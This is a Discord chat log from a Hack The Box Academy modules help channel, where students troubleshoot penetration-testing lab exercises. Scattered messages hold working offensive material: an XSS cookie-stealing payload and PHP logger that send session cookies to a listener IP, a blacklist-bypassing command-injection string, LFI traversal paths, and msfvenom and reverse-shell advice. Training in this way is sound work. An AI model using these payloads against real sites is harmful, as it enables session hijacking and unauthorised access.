#modules

1 messages ยท Page 44 of 1

graceful rampart
#

could be a whole list of things

meager pike
#

Hello to everyone who has done the Skills Assessment - File Upload Attacks ,

#

?

#

I got the source code for upload.php but I don't understand how lol I would appreciate it if someone could explain and stuck

strange aspen
#

im trying with impacket mssqlclient.py again: ModuleNotFoundError: No module named 'impacket.examples.utils' can someone tell me what to do?

rustic sage
#

jsnice down for anyone else? any1 know an alternative

strange aspen
graceful rampart
thorn urchin
#

one scenario would be if this was an oddity in having domain admins be local admin on the box that could suggest they actually log into it from time to time. So if you leverage system or admin from some other means, you have a chance at dumping domain admin creds from the box.

thorn urchin
#

but thats not inherent to them being local admins, just a red flag

graceful rampart
#

exactly

dim hound
graceful rampart
#

Who do I talk to regarding someone trying to get me to help them with the CPTS exam?

fathom pendant
#

maybe a serious rule break role or dm a staff?

graceful rampart
#

Yea. prolly dming staff is best right?

fathom pendant
#

ye

strange aspen
rustic sage
#

Yo, I'm in the web attacks module at Error-based XXE.
Exploit works for the files in the question. However, other interesting files like the /etc/passwd only return 'entity reference loop'..
First of, this comes from php (loadXML), not the web server?
Also, I'm not sure what is the cause of the error. I was thinking maybe encoding or any special XML characters in the file, but I'm not sure which ones that would be for /etc/passwd. Also other source code files (index.php) return it

high sentinel
#

'entity reference loop'
are you doing direct output or OOB?

rustic sage
high sentinel
#

well sounds like there's a reference loop: entity1 => entity2 => entity1.

rustic sage
#

Yea, sure. I just don't get how this is coming. I tried super random names, and I don't see how /etc/passwd would reference any other entity

high sentinel
#

what exact payload are you using?

rustic sage
#

Is it okay to DM to avoid spoiling anything for others?

high sentinel
#

i guess so

wraith spoke
#

I really love the 90K wordlist for a SMB attack and then finding out after 2 hours I should have reversed the order ๐Ÿ˜„

high sentinel
#

tac ๐Ÿ‘€

fathom pendant
#

hey @high sentinel you mind helping me understand something if you know... because I'm just not sure how this works in terms of vHosts and IPs regarding adding them to my /etc/hosts or am i putting them in the wrong place - currently doing Info Gathering - Web Edition; Active Infra ID - and I got the answer - but I had to use the cheat sheet bc nowhere in the documentation up to that point talks about using vHosts (there is a virtual hosts section, but after)

high sentinel
#

yeah, sure

raven cairn
#

Are you asking how vhosts work?

fathom pendant
#

basically? because in that section it says "these are the vhosts you'll need"

#

but nowhere previously did it talk about using vHosts

raven cairn
#

So when you type in url into a search bar there is a process called Dns that maps the url to an ip

fathom pendant
#

ye

#

i get that

high sentinel
fathom pendant
#

i just want to know what makes the curl command that gets me the answer different from the other tools

raven cairn
#

Sorry haha

high sentinel
#

np, i was joking ๐Ÿ˜„

raven cairn
#

The computer checks your host file first, then the dns cache, then it will go thru the dns process. The /etc/hosts file is just a way to resolve a name to an ip

fathom pendant
#

curl -s and -H syntax that was in the cheat sheet

#

ok so i just forgot to add the IP to the vhosts in /etc/hosts

#

then?

high sentinel
high sentinel
#

That should give you the idea of how that works

fathom pendant
#

ok I figured it out

#

I just didn't add the IP to the vhost

#

added it; refreshed the webpage

#

:D

#

i'm just the big dumb

high sentinel
#

nice, but you may want to try other ways as well ๐Ÿ™‚

#

You may not have the option to edit hosts file in some cases (like pivoting though non-rooted compromised host)

fathom pendant
#

wait no

#

i'm still dumb

#

:^)

high sentinel
raven cairn
#

The other day I was stuck on a stupid question because i forgot how to rdp ๐Ÿ’€

vague flint
#

Do you guys hack servers for me?

fathom pendant
devout sleet
#

This group fund for python questions?

raven cairn
fathom pendant
#

OH

#

I AM

#

THE HUGE DUMB

#

thanks @high sentinel and @raven cairn

devout sleet
#

has anybody a good course for Machin learning>

fathom pendant
#

i realized why i was getting the result weird... I was curling the wrong http page :^)

high sentinel
fathom pendant
#

i forgot to actually put the vHost URL and was trying to use the actual IP :^)

raven cairn
#

My cousin does Ml as a job

fathom pendant
#

when I tell you I died on the inside when i made the dots connect

#

but I didn't want to move on to the next thing without knowing what the difference was

#

the difference was

high sentinel
fathom pendant
#

well yes that's why I said; I understood how the -s and -H worked

#

it logically made sense how they worked in my brain

#

-s is source and -H host

high sentinel
#

wut? isn't -s for silent?

fathom pendant
#

idk

#

that's just what the cheatsheet said

#

:^)

#

yes

#

yes it is

high sentinel
#

there's also another option for stuff like burp ๐Ÿ™‚ you might want to check that as well

devout sleet
fathom pendant
analog jungle
#

hey everyone, nood here. I'm trying the redeemer challenge, but when I try connecting to redis: redis-cli -h IPaddress. Nothing happens. it just hangs there. Any advice?

high sentinel
raven cairn
#

This is mostly focused on modules so we might not be of good help

high sentinel
raven cairn
#

There is a #challenges channel but i think you need to verify

analog jungle
high sentinel
#

are you sure you just don't have an "empty" prompt?

#

did you type something in?

analog jungle
#

I have to type ctrl + c to exit it

high sentinel
#

nc -nvz -w 5 ip:port?

analog jungle
#

Whats nvc ?

high sentinel
#

typo ๐Ÿ™‚

fathom pendant
#

OH i see what the z option is

#

neat

analog jungle
high sentinel
#

๐Ÿ˜„

#

i meant ip port ๐Ÿ˜„

fathom pendant
#

lol

analog jungle
#

ahh i see ๐Ÿ™‚

#

(UNKNOWN) []x.x.x.x 6379 (redis) open

#

but then , using redis-cli, it just hangs there.. not sure whats happening. I tried restarting the server couple of times already

high sentinel
#

what if you just connect using nc and type help or keys?

high sentinel
analog jungle
#

I've seen some people demoing it and they go straight to IPADDRESS:port> prompt

high sentinel
#
(UNKNOWN) []x.x.x.x 6379 (redis) open

sounds good to me

analog jungle
high sentinel
#

that's not my point. If you're having further trouble you need to go deeper

high sentinel
#

already told you - check the traffic

analog jungle
high sentinel
#

i'd say it would be easier to just do tcpdump -i any -vvv tcp port 6379 in one window and use the nc in a second. Typing anything should show you data going both ways

analog jungle
#

as soon as I come off the VPN, boom all the traffic starts flowing through tcp dum p

high sentinel
#

sounds like a vpn issue

warm pelican
#

Need a sanity check for the Skills Assessment for Using Web Proxies, in particular the first question, getting a flag from lucky.php.

#

Can't tell if it's bugged or if I'm doing it wrong.

graceful rampart
sterile mirage
#

Can someone help me with the Burp Intruder module, specifically: Use Burp Intruder to fuzz for '.html' files under the /admin directory, to find a file containing the flag

I don't understand how to do it

graceful rampart
warm pelican
rustic sage
#

how do i copy and paste from host to pwnbox

fathom pendant
#

ctrl+c > ctrl+v (if pasting to the terminal, ctrl+shift+v)

rustic sage
#

doesn't work tried it

fathom pendant
#

first time that pwnbox is run it asks if you want to share clipboard

rustic sage
#

hmm never got asked that any time i've run it

fathom pendant
#

click the lock/icon next to the https in the address bar of the page

rustic sage
#

i don't have that it only shows me encryption ssl key

#

running firefox

fathom pendant
#

it's under site settings

#

ยฏ_(ใƒ„)_/ยฏ

#

might be under the shield icon

rustic sage
#

lol nope

#

i have vnc config window that says kclipboard but its just a window no oik button or nothing

fathom pendant
#

ยฏ_(ใƒ„)_/ยฏ

rustic sage
#

pwnbox is hot garbage i'd rather put my &&&& in a beehivew than use it

graceful rampart
rustic sage
#

lovely sentiment but some of the tools they want you to use don't work on newest version of kali

#

and then i spoend hours trying to debug which is bullshit

graceful rampart
#

I havent had a single issue at all. The only time ive had to use pwnbox was for some web related things where scans wouldnt run properly on my kali machine

#

all tools so far have been perfecty fine

#

Which tool are you having an issue with?

rustic sage
#

well thats great here's a cookie for you: cookie=klhjdfsg8h94539t8hy4we5tt

#

๐Ÿ˜„

graceful rampart
#

lol. Well i was going to try to help you

#

now im not

rustic sage
#

that's ok it was a joke don't get all butthurt

raven cairn
#

Web Pwnbox is kinda bad

#

I have issues with full screening it

graceful rampart
# rustic sage that's ok it was a joke don't get all butthurt

lol. Im spending my time trying to help you. Heres a valuable lesson, you are not entitled to help from anyone. If someone is going out of their way tot ry to help you, its generally a good idea to try to be nice to them. Now, best of luck. I hope you get your tool working

graceful rampart
raven cairn
#

Using a VM with vpn is just easier

graceful rampart
#

agreed. Altho I do have to get used to using an in browser machine. RTO is only doable using the provided in browser machine. Thats how you get to use cobalt strinke

#

But i think ill keep avoiding pwnbox for the time being

raven cairn
#

I canโ€™t wait to do RTO

graceful rampart
#

Yea. Im super excited for it

#

Thats the only thing pushing me through the more boring parts of CPTS lmao

fathom pendant
#

Hey @graceful rampart can you sanity check sth for me, info gathering web says to use a "numbers.txt" file for the wordlist in active subdomain enumeration in the example but I don't see anything? lol am I just... silly?

graceful rampart
#

I was not doing good notes on the exercises back then ๐Ÿ˜ฌ

fathom pendant
#

oof

#

ik the pattern file is one we create there but like it's asking for a wordlist I just don't see

graceful rampart
#

I have great notes on those sections, but none of it really gave me any issues and none of it was really new to me so i didnt bother taking notes on the exercises

fathom pendant
graceful rampart
#

hmm

fathom pendant
#

i checked pwnbox as well

graceful rampart
fathom pendant
#

in the example

graceful rampart
#

ah. iirc you dont need to do that

#

thats just an example

fathom pendant
#

I know but it's nice to follow along :^)

#

i was just gonna give up and start answering questions anyway

#

lol

graceful rampart
#

fair. It appears to just be a placeholder for whatever wordlist you want to use

fathom pendant
#

yeah

fathom pendant
#

ugh

#

stuck at that how many zones... i must not be able to count right or something LOL

fathom pendant
#

it's funny because that's my own answer fingerguns

#

I just probablycan't count that's all

ivory dock
#

Right lol

#

If you're in the 20s or higher, you're WAY off

#

Took me a while to finish that question

fathom pendant
#

I STG

#

I must have had a space when I put that in

#

because I put in the answer way earlier

#

and it was incorrect

#

but no apparently it was exactly correct

#

brb malding

ivory dock
#

It's not the amount you would expect

fathom pendant
#

oh no; I had the answer

#

i definitely had the answer

#

I just had a space in my answer the first time

ivory dock
#

Ahh

#

Lol nice

#

Happened to me in the vhost exercises

fathom pendant
#

rest of the questions nailed

#

this one "can I just not"

graceful rampart
fathom pendant
#

also while statements are based at basic automation without looking for a specific tool that does it better

#

cat x| while read var; do task var other args; done

tiny ember
#

Hey all, I"m struggling on Shells and Payloads for host 1 ||where i know the attack vector but for some reasons metasploit is erroring out. When i manually nagivate to the loaded exploit i get a 500 error. Is there something wrong with how i'm setting the options?||

#

||The first time i try to navigate to it manually it gives a 404, when i reload it gives 500, which i guess make sense considering it suppose to create a metainterpreter or whatever its called||

graceful rampart
#

Your lhost dosent look correct

tiny ember
graceful rampart
#

I'm well aware

#

The target network is 172.16.1.0/23

tiny ember
#

ahh, maybe that first one?

graceful rampart
#

You shouldn't be using the docker ip

#

Lmao

tiny ember
#

word, thanks

graceful rampart
#

Np

tiny ember
#

๐Ÿคฆโ€โ™‚๏ธ

#

meh, same error

graceful rampart
#

You could always just generate a payload with msfvenom

#

Upload it and then trigger it manually

#

Or try not using a meterpreter payload

tiny ember
#

||yeah thats a thought, but need to be converted into a .war file||

graceful rampart
#

You can generate a war file is msfvenom

tiny ember
#

hm.. kk

graceful rampart
#

With*

tiny ember
#

thanks

graceful rampart
#

Np

tiny ember
#

fucking hell... too easy drill sargent.

#

thanks again dude

graceful rampart
#

Np

glad apex
#

Hi

ruby dagger
#

Hi, can someone help me please? I'm stuck in Module "Introduction to Bash Scripting"

final elm
#

y so serial

ruby dagger
#

What?

final elm
#

funny name for a git repository

ruby dagger
#

?

final elm
#

nvm

high sentinel
ruby dagger
#

Oh ok, sorry I didnt know

high sentinel
#

huh? ๐Ÿ˜„

ruby dagger
#

Nah, thats not really helping me, but thanks. My code seems to be fine and only has very few lines, but the result wont be accepted

#

I even tried it with my local VM and countless other ways - same result, but wont be accepted

high sentinel
#

i'm not getting what the issue is. You didn't post anything specific

#

ysoserial is not related to bash at all, it's related to java deserialization attacks

ruby dagger
#

One second

uncut crest
#

Anyone else having vpn issues where the host address isn't resolved and openvpn loops?

ruby dagger
#

Yeah, sorry my bet

#

My code is:

high sentinel
ruby dagger
#

var="9M"; salt=""; for i in {0..27}; do; var=$(echo $var | base64); done; salt=${#var}; echo $salt;

#

The code is supposed to encode $var 28 times and then get the number of characters of the hash

#

Sadly I dont understand my error

high sentinel
#

and the error is?

ruby dagger
#

Simply that HTB Academy claims my answer as wrong

high sentinel
#

yeah i get that, i mean you're not getting any error when running the code, right?

#

what does it output?

ruby dagger
#

34070

#

When I use salt=$(echo -n $var | wc -m) it simply retuns 34071, but this is still wrong

#

And with that few lines of script code I'm sure the error is somewhere else

high sentinel
#

do; var is not the correct syntax by the way

ruby dagger
#

yes, I didnt use ";" actually, I just wrote it in separate lines

high sentinel
#

and i think the issue is also using base64 instead of base64 -w0

ruby dagger
#

Let me try, 1 sec

#

Nope, still wrong :/

high sentinel
#

then just debug it - check the actual output, lower the number of iterations etc

ruby dagger
#

I already did this

#

I also tried with 27 and 29 iterations instead of 28

#

And various code variations

high sentinel
#

you're not getting the point

#

try 8 iterations and debug the output you're getting

#

then if it's correct, just increase/decrease gradually until you find you what the issue is

ruby dagger
#

The output is already correct

#

I even tried copying the output to a file and counting the characters from there

#

How do I know if the output is correct at 8 iterations?

low vine
#

In command injection module "Bypassing Other Blacklisted Characters"
I'm having trouble understanding why my payloads not working
||ip=127.0.0.1${LS_COLORS:10:1}cd%09${PATH:0:1}home${LS_COLORS:10:1}{ls,-la}||
I'm attempting to access /home but I must not be understanding something quite right.
In my mind this payload should do....
127.0.0.1;cd /home;ls -la
Which should execute but I'm just not understanding something

sly tapir
#

shouldnt those be flip flopped @low vine

#

i.e., ls -al /home

low vine
#

My bad understanding is that each section is executed so 127.0.0.1; Then moves to /home and then executes ls -la?

#

or is my understanding wrong on that @sly tapir

#

Ill give it a go and see what happens I feel like I cant be too far off just been struggling for a minute

sly tapir
#

i always just do ls -al /directory/

low vine
#

now that I think about it

#

thats probably better from what I'm trying to do lol

#

Grr okay have to be messing up something else let me read back through everything again

steady totem
vale salmon
#

So I am working on the PtT Windows Module of Password Attacks. The first task tells me to RDP to the machine using the provided credentials and find out how many tickets there are. When I try to RDP in, though, it keeps giving me a logon failure. I am 100% certain I am using the displayed credentials and it is driving me insane.

low vine
#

I just assumed what was there facepalm.jpg

fathom pendant
#

tfw i wonder why the ffuf request in the info gathering web is taking forever... Turns out; i needed to reset the target; idk if this is one of the targets that has a dedicated IP or not when you reset but I got the same IP :D

steady totem
fathom pendant
#

ok so ffuf is a neat tool :D

median halo
#

For the Firewall and IDS/IPS Evasion - Hard Lab, im so stuck on this one any help please

fathom pendant
#

scan for all ports

median halo
#

okay ill try that i keep coming up with only 2 thanks

fathom pendant
#

also you'll need to use a specific type of scan talked about in the module

#

no super fancy tricks to at least identify it

median halo
#

okay thank you

#

i have the port but not the version

fringe shell
#

no question...just venting. The RDP session for the final assessment in the Shells and Payloads module is ridiculously slow. Took me 10% of the allocated time to just login to apache on the first host ๐Ÿซ 

fathom pendant
median halo
fathom pendant
#

mood

median halo
#

same as when missing a god dang ;

#

i swear i was about to go mad lol

fathom pendant
#

dude I was so mad earlier; my answer had a space in it so it didn't accept xD

median halo
#

OMG yes!!! thats the bs ive had too haha

graceful rampart
fathom pendant
#

@graceful rampart just finished the info gathering one WOO

graceful rampart
fringe shell
graceful rampart
#

Yea. I used sshuttle to pivot via the attack machine

rustic sage
#

Need help with Hard Skills Assessment - Password Attacks, I made it quite aways I know im on the right track problem is there must be something wrong with the worldlist selected because im trying to crack a password and its taking forever.

graceful rampart
sterile mirage
#

Need check for the Skills Assessment for Using Web Proxies
Can't tell if it's bugged or if I'm doing it wrong.

sterile mirage
#

I couldn't find the flag for the first question.

graceful rampart
#

If you're still having issues shoot me a dm. I'm not at my pc right now but I did that module earlier today so you should be able to jog my memory

sterile mirage
#

ok ok I'll write to you, thanks

faint current
#

somebody save me?

high sentinel
fathom pendant
#

from the nothing you've become?

faint current
#

I registered on the site, ok! But when I try to connect to HTB academy it says that my email has not been registered.

#

some bug on the page is happening

fluid maple
#

Can ayone help with the Footprinting Lab - Easy? I'm not sure if my question would end up being a spolier, so anyone around for a DM would be helpful. Thanks.

glad wave
#

You can DM me if you need

fathom pendant
faint current
#

Iยด canยดt use same email?

fathom pendant
#

You need to create an account on academy you can use the same email

faint current
#

He didn't let me use the same email, says the email exists in the database

fathom pendant
#

Are you trying to sign in, or create

#

Because there shouldn't be an issue with creating an account

#

Usually if an email doesn't exist in the login database means creating an account should be ok

#

If it exists, are you sure you don't already have an account?

#

Have you asked it to send you a password reset?

#

Easy solutions here

faint current
#

I managed to do but only with another email. Same email doesn't work

high sentinel
#

@fathom pendant why don't you hang around in the vc sometime? you seem to be pretty active ๐Ÿ˜„

fathom pendant
#

I don't like talking to people. I do it as a job and that's enough already

faint current
#

I did it! Thank you

fathom pendant
#

Anyway straying off topic in this chat

faint current
#

What's the right place?

#

sorry!

fathom pendant
#

#1024429874246590575 for general help, this channel is for questions regarding the modules in the academy site

faint current
#

ok bro, thanks!

#

and sorry!

ripe terrace
#

~~I'm having trouble with the lab "Attacking Common Services - Hard". I've gained a basic foothold for the user ||fiona|| and can connect via ||RDP|| and ||MSSQL|| - and can impersonate the user ||john|| - however, cannot seem to get ||sysadmin||.

Has anyone finished this lab that could help out / DM?~~

Scratch that; I had a sudden realisation and solved it.

fringe shell
#

TL;DR What is the best way to get a reverse shell through proxy?

I just finished the Shells and Payloads module and in the assessment I used chisel to pivot through the host.

When using the psexec metasploit module, I had to use a bind_tcp payload, as I couldn't figure out how to catch the reverse shell. I also couldn't drop into an actual shell from the meterpreter prompt and just had to use its built in cd,cat etc. to get the flag.

What is the best way to pivot metasploit exploits and catch the rev shells?

low vine
#

In the file inclusion section question #2 is stumping me and I'm not understanding why. Submit contents of flag.txt and we know the file path. I'm not understanding why I cannot pull the contents from this. I can read etc/password with X=||../../../../etc/passwd|| but cannot get access to the flag.txt file even though I know the direct path I should be able to just do X=../(DIRECTPATH) should I not?

#

should just be something like ||X=../../../../usr/share/flags/flag.txt|| should it not?

#

Apparently I'm dumb and somehow didnt do this correct first time ><

ripe terrace
#

Read the rules bud. This isn't the server, nor the channel for this anyway.

novel matrix
#

No

low vine
#

Getting stumped on basic bypass but working through reading through everything again

warm lichen
#

Yep no worries. Just a tip for asking a module related question, post the exact exercise (e.g. if it's the Skills Assessment, or one of the module exercises) so the person can go and look it up on their notes or look at the question themselves

warm lichen
low vine
#

Makes me cry sometimes :p

low vine
warm lichen
#

Hmm well, there isn't really a "logical" next step that you're supposed to test. You try whatever you think might work.. and if you do this enough times, you just tend towards a framework you can use when you encounter a specific class of vulnerability

low vine
#

So ended up getting it but I dont understand how I would get there other than knowing its something I should try

#

Just trying to make sure I have notes as a sort of smal mental checklists when going through more web apps.

potent pewter
#

hey guys can somebody help me out with the Skills Assessment - File Upload Attacks, so far i got the upload.php source code, I understood the logic and bypassed all the filters, i did get a couple of success however my uploaded files do not accept php commands

viscid epoch
#

yes please

frail thicket
#

Hello folks! In the module RDP and SOCKS Tunneling with SocksOverRDP, anyone faced the following issue when loading SocksOverRDP-Plugin.dll?

frail thicket
#

Never mind, worked after bypassing Windows Defender.

graceful rampart
thorn goblet
#

Can anyone please give me a hint in the Documentation & Reporting Practice Lab on how to get Domain Admin? Seems kind of hard for a first question so i feel like I'm missing something

feral willow
#

Maybe today any help for this problem?! ๐Ÿคฏ

slim oar
#

Can anyone pls hack an instagram account for me pls. I would very much appreciate it. Dm me for infos.

spare condor
#

@vale salmon Can I DM you regarding this please?

slim oar
thorn urchin
#

also for future reference, asking on discord of which is corporate owned and susceptible and agreeable to even low level supoena for a stranger, that could be an undercover cop for all you know, to commit a crime on your behalf is incredibly, monumentally, stupid.

rustic sage
#

What academy modules are recommended to read for OSCP preparation?

glass pecan
#

hello, I have a question regarding the skill assessment of windows command line, the 3rd question ask me to enumerate the system information to get the host name and I will find the flag for the next question, I manage to answered the question but never saw a flag, I try to use the answer as the password for the uses3 user but it looks the password is wrong can someone give me some insight or I am missing something?

thorn urchin
graceful rampart
#

Youll end up confusing yourself on OSCP if you learn that much AD

glass pecan
#

ok never mind this is very misleading XD correction user3 kek NotLikeThis

glass pecan
#

oki

fathom pendant
graceful rampart
#

lmao

fathom pendant
#

Either that or we're all stupid and misreading it as the correct user anyway

#

Lol

glass pecan
rustic sage
#

I have to recursively scan the paths to find the flag. I use this command ```ffuf -w /opt/useful/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://IP:PORT/FUZZ -recursion -recursion-depth 1 -e .php -v

graceful rampart
#

make sure you have the correct IP and port

rustic sage
#

i got it right

#

just don't wanna expose anything right here

graceful rampart
#

dm me the exact command you used

rustic sage
#

i don't even think I can expose anything here you go: ffuf -w /opt/useful/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://165.227.231.233:31349/FUZZ -recursion -recursion-depth 1 -e .php -v

graceful rampart
#

Make sure you got the IP and port ocrrect. I know, you already checked but i said the same thing during that module several times and i had the wrong ipa nd port in my commands

rustic sage
#

hmm its correct. should i open up a chat with support?

graceful rampart
#

๐Ÿคทโ€โ™‚๏ธ

rustic sage
#

ill open one up

sly tapir
#

usually its a couple things, the ip/port because you tabbed a previous call, the list directory is wrong, or the list doesnt have what you need

tough vector
#

he guys ฤฑ m the hacker

#

ฤฑ like fotball club is the GALATASARAY

fathom pendant
#

poggers

tough vector
#

where from ?

#

ฤฑ m from TรœRKฤฐYE

#

NO ENGLฤฐESH

graceful rampart
#

Server rule number 5: Unless otherwise dictated by the channel, please keep all communication in English.

tough vector
#

OKEY SORRY

floral narwhal
#

Hey guys I canโ€™t find prolabs channel here

sly tapir
rustic sage
#

Hey all! I'm stuck at the XSS Session Hijacking part. I've tried to search on Discord but couldn't find an answer so I'd appreciate some help ๐Ÿ˜„ Put some spoiler tags.

||This is what I've done so far:

  • Made an index.php using the code provided:
    <?php
    if (isset($_GET['c'])) {
    $list = explode(";", $_GET['c']);
    foreach ($list as $key => $value) {
    $cookie = urldecode($value);
    $file = fopen("cookies.txt", "a+");
    fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
    fclose($file);
    }
    }
    ?>

-I use this payload in the Profile Picture URL:
"><script src=http://10.10.15.200:80/script.js></script>

  • I put this in my script.js to grab the cookies:
    new Image().src=โ€˜http:/10.10.15.200:80/index.php?c=โ€™+document.cookie;

I've also tried:
document.location='http://10.10.15.200/index.php?c='+document.cookie;

I use this to start my php server:
sudo php -S 0.0.0.0:80

All I get on my server is:
accepted
200 GET /script.js
closed||

Thanks for helping โค๏ธ

sly tapir
floral narwhal
#

Plz help

rustic sage
# sly tapir Did you read the script and fill out the โ€œremote addrโ€

yes! i am using this index.php:

||
<?php
if (isset($_GET['c'])) {
$list = explode(";", $_GET['c']);
foreach ($list as $key => $value) {
$cookie = urldecode($value);
$file = fopen("cookies.txt", "a+");
fputs($file, "Victim IP: {$_SERVER['10.129.52.35']} | Cookie: {$cookie}\n");
fclose($file);
}
}
?>||

I'm still getting the same output in my terminal though

graceful rampart
floral narwhal
#

Got it thank you

thorn goblet
#

Can anyone please give me a hint in the Documentation & Reporting Practice Lab on how to get Domain Admin? The admin hash doesn't get me anywhere. Seems kind of hard for a first question of a medium lab so i feel like I'm missing something

thorn urchin
graceful rampart
#

if youre trying to use spoiler tags you do it like this: || message here ||

tidal kelp
onyx dust
#

I could use a nudge on Footprinting, Medium Lab. I have been unable to find the user login or sa credentials. I found a mounted drive, but when I tried to mount it to my machine, I cannot access the results. I have tried various enumeration techniques for SMB and RCP, but I always get turned away because I don't have credentials. Unable to login via RDP. Any tips would be appreciated.

carmine quail
thorn urchin
graceful rampart
thorn urchin
#

the final two modules are meant to be culminations of everything youve learned

graceful rampart
#

You dont need the domain name in the kinit command

#

just LINUX01$ should work

rustic sage
#

Im having problems connecting via RDP in Kerberos - Windows, AD module. Wrong credentials :S

tight basin
graceful rampart
#

Not sure. I dont use kinit much. Usually just set the KRB5CCNAME variable manually

#

But i believe its cuz kinit only expects the username because it can pull the domain from the ticket

proud pine
#

For the 'documentation and reporting' module, they start us out with "write hat" as a reporting tool, but this might very well be one of the worst pieces of software I've ever used. What are the better options?

graceful rampart
#

the reccomended way to learn si to do some HTB Academy modules, then attemt to do 2 of the reccomended htb machines (with a writeup if needed) and then attempt a 3rd reccomended machine on your own

leaden quail
#

Hello, how can i compile the Inveigh Github Repo to inveigh.exe?

foggy kernel
#

Hello Im doing the module GETTING start

#

and i have an issue with my nmap cmd

fathom pendant
#

What error are you receiving

winged zodiac
#

Module: Local File Inclusion
Section: PHP Wrappers
Issue: Used the data wrapper technique and can view 320___.txt file but can't read the flag any help is appreciated

wraith spoke
#

Lesson learned brute forcing winrm goes faster then rdp. Wish i found out when i started 2 data ago. ๐Ÿซฃ

wraith spoke
#

Days.

warm nest
#

Hi, I am beating my head against a wall in Password attack - credential hunting in Linux. I used the hint of user and known PW and created mutated list of passwords and tried with hydra and cme but found nothing. Found the expected pw in a forum post from a year ago but that also didnt work. Can somebody dm me the kira pw? Waiting 1h in front of a screen is not really rewarding

fringe shell
raven cairn
thorn urchin
graceful rampart
graceful rampart
raven cairn
#

That's what I've heard haha

thorn urchin
#

Ive been hearing people get tripped up on the oscp ad section cause they overthink it

#

and then when they stop its seriously done in like 30 mins to an hour

graceful rampart
#

Yea

#

Took me 45 minutes

warm nest
rustic sage
#

folks at OFFSEC going through this chat

graceful rampart
#

Oh i didnt pass the exam lol. I just did the AD bit in 45 minutes

#

Theres very very little actualy AD exploitation

thorn urchin
#

Do you know what your pain point was? or just a mystery Fail letter?

graceful rampart
thorn urchin
#

so blitzed the AD and bombed the individual boxes? lol

graceful rampart
#

anyways, in other news: The dreaded day has arrived. My kali VM finally pooped the bed

graceful rampart
fathom pendant
#

Rip

brave sail
#

Does anyone know whats the command for retrieving the content of a imap message?

#

Have tried fetch command, but haven't gotten results back

high sentinel
#

if you meant that you actually wanted to connect to the server and read the mailbox

#

otherwise you can locally do mail

#

or even read a .eml or so .. not totally clear what you meant there

brave sail
#

it so happens that the message isn't in the mailbox section

#

okey okey i'll try

high sentinel
brave sail
#

i meant INBOX

#

mb mb

high sentinel
#

if inbox is empty, then it's just empty

#

there's nothing to do about it

brave sail
#

right, okey

thorn urchin
#

try checking other mailboxes. Inbox isnt the only one people exclusively use.

uncut meadow
#

Hey team, Im stuck for days on the Password Attacks Lab -HARD Initial access as I need to reset the Target all the time... Can somebody help me on that please?

thorn urchin
#

what part are you stuck on

brave sail
#

I'm currently at Footprinting;Imap section

#

I have found an inbox with a message, but i have trouble dislaying the content

#

have selected it with LIST command

#

and select

tiny ember
#

what other email service is there besides imap?

brave sail
#

theres both pop3 and imaps

tiny ember
#

dming you

uncut meadow
thorn urchin
uncut meadow
#

Initial access, I triy ||Bruteforce the smb, Bruteforce the rdp, both with johanna user only and also with user list|| but nothing

graceful rampart
#

and i have really good notes on it

graceful rampart
uncut meadow
#

the one given in the Resources and the mutated one created with this list and the rules given

thorn urchin
#

Shoulda found it then if your bruteforce commands were correct

#

Its one that triggers so fast I thought it was a false positive at first

uncut meadow
#

I mean it's my second day of bruteforce attempts hahahha

thorn urchin
#

yeah so probably less of using the wrong list or wrong service and more likely your command arguments are wrong.

uncut meadow
#

can I DM you??

thorn urchin
#

at the airport and sounds like Man in the Purple Tux might have better notes than me. I don't have the command structure I used listed.

#

just that very much if you have it correct, youll find it in seconds. If its taking a minute or longer, somethings wrong.

uncut meadow
#

ok

#

strange

#

@graceful rampart are you available for helping me?

graceful rampart
#

Dm me what command your using

velvet pawn
#

no worries, got it!

rustic sage
#

Hello can someone pls help me

#

i got hacked and i am trying to hack my account back

#

for google

#

or i wanna do something back to the person that hacked my account

#

how do i get there Ip address

#

so i can turn off there wifi

graceful rampart
#

We dont do that here

rustic sage
#

darn it then what do you do here

thorn urchin
rustic sage
#

darn i was hoping to just get there Ip

thorn urchin
#

no. read the rules

rustic sage
#

Well i will figure it out

velvet pawn
#

second time that not taking the time to fully read the section sends me down a rabbit hole....

rustic sage
#

I need help with the Hard Skills Assessment on the Password Attacks module.

#

I have come a long way made it far, just unsure how to do a specific step to get to the next stage.

#

I cracked a .vhd file, just unsure how to mount it on the windows machine, i have tried transferring it and accessing it through rdp and its asking for admin privileges. Unsure what to do here, the section gives very little detail on mounting a harddrive.

hollow vessel
#

has anybody had issues using wireshark within the attack box given to you in active directory enumeration and attack module... not your attack box from htb but the one you have to rdp into in order to enumerate the internal network

high sentinel
hollow vessel
#

when I try to start wireshark from applications>pentesting>sniffing spoofing>wireshark as htb-student it does not open after putting in password, if I try from command line as htb-student I get zero traffic on any interface probably because not root, when I log in as root wireshark will not open at all through command line

#

I can share screen in academy voice chat and demo exactly the problem

vital adder
#

but for windows if you can't double click to mount it i think you should be able to in disk manager (i'm not sure about windows home)

supple shoal
#

Hello, i'm in Password Attacks > Credential Hunthing in Linux
I tried creating a custom.rule to include LoveYou1 in it, but I couldn't find kira's password. Can anyone help?

graceful rampart
#

If you want to mount it on windows youll need your own windows vm to do so on

graceful rampart
vital adder
graceful rampart
#

agreed

vital adder
#

but the module only show you how to extract and crack the hash not mounted on linux (only on windows which is double click ๐Ÿคฃ )

graceful rampart
#

I just happen to use a windows VM for attacking a good bit of the time so i just had to boot it up and connect to smb

vital adder
#

oh yeah the first time i do this the hash was corrupted ๐Ÿคฃ

graceful rampart
#

lmao

supple shoal
graceful rampart
#

idk what you want me to tell you?

#

Oh, wait no

supple shoal
#

is it correct?

graceful rampart
#

its not in the list to begin with

#

you have to add LoveYou1 to password.list before mutating it

#

(if you want the bruteforce to go quick just create a fill withonly that 1 password and then mutate that)

supple shoal
#

oh

#

thanks, i will try !

#

i put loveYou in passlist and mutated it..

marble raft
#

Hi guys! Having some trouble on Attacking En
After obtaining Domain Admin rights, authenticate to the domain controller and submit the contents of the flag.txt file on the Administrator Desktop.

Already have the creds and added the user to the Domain Admins yet i can't RDP to the DC.

Edit: I'm just dumb, PTH is a your friend.

devout flint
#

Hi im doing the intro to windows command line module and i been stuck in this question for hours, what should i do?

devout flint
#

oh i already solved it thank you, i was at the wrong mahine it seems that you have to ssh to 172.16.5.155

vital adder
#

oh yeah i last question of the skill assessment

#

they should noted somewhere you need to do it on the DC

marble raft
devout flint
ripe terrace
